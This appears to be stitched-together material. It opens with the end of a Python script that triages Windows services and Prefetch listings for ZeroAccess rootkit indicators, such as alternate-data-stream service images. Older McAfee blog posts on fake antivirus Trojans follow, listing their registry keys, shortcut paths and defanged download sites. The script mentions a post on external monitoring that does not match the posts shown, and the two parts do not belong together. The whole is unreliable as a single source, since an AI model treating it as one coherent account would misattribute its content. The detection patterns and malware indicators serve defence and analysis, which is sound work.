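        reasons.append("loads from a directory ZeroAccess uses for its hidden store")
    return reasons


def triage_services(reg_output: str) -> Dict[str, List[str]]:
    """Map each suspicious service to the reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    for name, image in parse_reg_query(reg_output).items():
        reasons = triage_image_path(image)
        if reasons:
            findings[name] = reasons
    return findings


def odd_prefetch_entries(names: List[str]) -> List[str]:
    """Entries in \\Windows\\Prefetch that are not something Windows 7 writes there."""
    return [n for n in names if not PREFETCH_OK.match(n)]


# Constructed export: two normal services and one ZeroAccess-style tripwire service.
REG_SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\System32\spoolsv.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Beep
    ImagePath    REG_EXPAND_SZ    \SystemRoot\System32\drivers\beep.sys

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\93ab0f21
    ImagePath    REG_EXPAND_SZ    \systemroot\3155945044:2870600771.exe
"""
```

Feed `triage_services` the output of `reg query` taken from a hive loaded off the image (or from a clean boot environment), and `odd_prefetch_entries` a directory listing made the same way; listings taken on the running system will simply not contain the rootkit's objects, which is the point the post makes about external monitoring. Note the ADS check fires on any `file:stream` ImagePath, not only numeric ones, because a stream-hosted service image has no legitimate use.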

Our systems are attacked daily by Trojans, viruses, worms, and other malware. We face these risks while browsing the Internet, chatting, downloading applications, and in many other ways. We know we have to protect our systems and that we need to use security software. Unfortunately, one of the most popular ways for the bad guys to make money is to trick users into believing their systems are infected. They conveniently offer to sell us fake, or rogue, security applications that often do little more than act busy and collect our money.


How harmful are rogue security applications?

FakeAlert anti-virus software can be harmful to your systems. FakeAlert Trojans operate in a similar way: we get them either during a "drive-by" install, or a downloader silently loads part of or an entire rogue security application.
Rogue software can sometimes damage the system and harm other drivers and utilities.

We use several detection names for fake anti-virus software, including FakeAlert-Antiviruspro, Rogue Antispyware, and Fraudtool.

 

Demonstration:

Let’s look at one example of fakealert software: When sysguard.exe runs on a victim’s machine, it infects the system and deletes the registry key of the AppInit_DLLs applications from the machine:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows "AppInit_DLLs"

The user sees the warning message in the next screenshot, and these registry keys are added:

HKEY_CURRENT_USER\Software\AvScan
HKEY_CURRENT_USER\Software\Microsoft\Windows Script
HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings


When this pop-up window warns of a (fake) infection, most users click on "Yes, remove threats."

beware.bmp

What happens next?

As we see in the previous screen, once the Trojan runs it offers a graphical interface designed to appear as a legitimate security application. It reports multiple "infections" on the victim's computer. It also adds the following registry value:

HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings "JITDebug"

Finally the fakealert software offers the user the chance to clean up the attack by buying the “full” rogue application. (See next screen.) Once the victim pays, the attacker has won. And the user’s machine remains infected by the rogue product.

 

beware2.bmp

How can you protect your system?


The first step in protecting yourself is to download the McAfee SiteAdvisor tool, which will warn you before you visit suspicious links.

McAfee anti-virus products such as VirusScan Enterprise 8.x have features that can help protect your PC: VSE supports user-defined rules that protect your system against fakealert Trojans.

You should also update your McAfee products to ensure you are protected from these threats.

You can help by sending us a sample for analysis in a password-protected ZIP file (use the password "infected"). For more details on how to submit fakealert-related samples, please visit this link: https://community.mcafee.com/docs/DOC-2752

Please use our updated McAfee FakeAlert Stinger tool to protect your system; it detects and remediates fakealert threats.

http://www.mcafee.com/us/downloads/free-tools/fake-alert-stinger.aspx


Fakealert-Sysdef

Posted by nchattop Aug 9, 2011

Many people search for free antispyware, install something purporting to be genuine, but unknowingly become victims and end up paying twofold: through the damage caused to their system, and potentially by later handing over credit card details to remove bogus infections.

 

One of the most popular fakealert variants currently seen is "Fakealert-Sysdef".

 

The tool is advertised under names such as System Repair, WinXPRecovery and XP Security.

 

fakealert1.bmp

 

FakeAlert may install itself onto your PC without your permission, via a drive-by attack on a compromised website.

 

If the victim tries to stop the scanner, it will not close; instead it forces the victim to sit through the scan, displays fake warnings and tricks them into buying rogue antispyware programs.

 

fakealert2.bmp

Often fake-alert infections will prevent the machine from working as expected. This makes the threat persistent and prevents users from remediating the infection. In some cases, fake-alert infections will hijack certain Windows Registry keys that associate applications with file extensions. The following shortcuts are created:

 

%UserProfile%\Desktop\Windows XP Repair.lnk

%UserProfile%\Start Menu\Programs\Windows XP Repair\Windows XP Repair.lnk

%UserProfile%\Start Menu\Programs\Windows XP Repair\Uninstall Windows XP Repair.lnk

 

It also connects to the following sites to download other malicious files:

    • hxxp://click[removed].org
    • hxxp://find[removed].org
    • hxxp://click[removed].org


To stay safe online we recommend that users buy proper AV such as McAfee, keep their software and operating system patches up to date, and ensure security best practices are followed at all times.


XP-InternetSecurity-2012

Posted by Nitin Kumar Aug 3, 2011

There is another 2012 fake AV, commonly known as 'XP Internet Security 2012', and 2011 is not even over yet.

This fake AV looks the same as 'XP Security 2012' (see the blog post at https://community.mcafee.com/community/security/top_threats/blog/2011/07/25/xp-security-2012 ).

When it is successfully executed, it presents the whole system as nothing but a pile of malicious files.

int1.jpg

It is really scary for someone who is not aware of this rogue AV to look at this picture. What is the next step? Get rid of these viruses. And how? Register for this software.

This is not free: the registration page carries user reviews of the same software to make it look genuine.

int2.jpg

int3.png

Now one more step: buy this software and scan with it. That's the catch, and the attack is successful.

Users should be careful about these fake AVs and should not download any AV from anywhere other than the genuine site. Especially when it comes to spending money, first confirm that you are buying a genuine product.

Keep your anti-virus updated and enable real-time scanning. McAfee detects this as a FakeAlert-Rena.* variant.

 

If you are infected with any fakealert, download McAfee FakeAlert Stinger < http://www.mcafee.com/us/downloads/free-tools/fake-alert-stinger.aspx > and scan the system with it; also start a discussion at the McAfee Top Threat community < https://community.mcafee.com/community/security/top_threats >.

 

Do not surf malicious sites: use SiteAdvisor ( http://www.siteadvisor.com/ ).
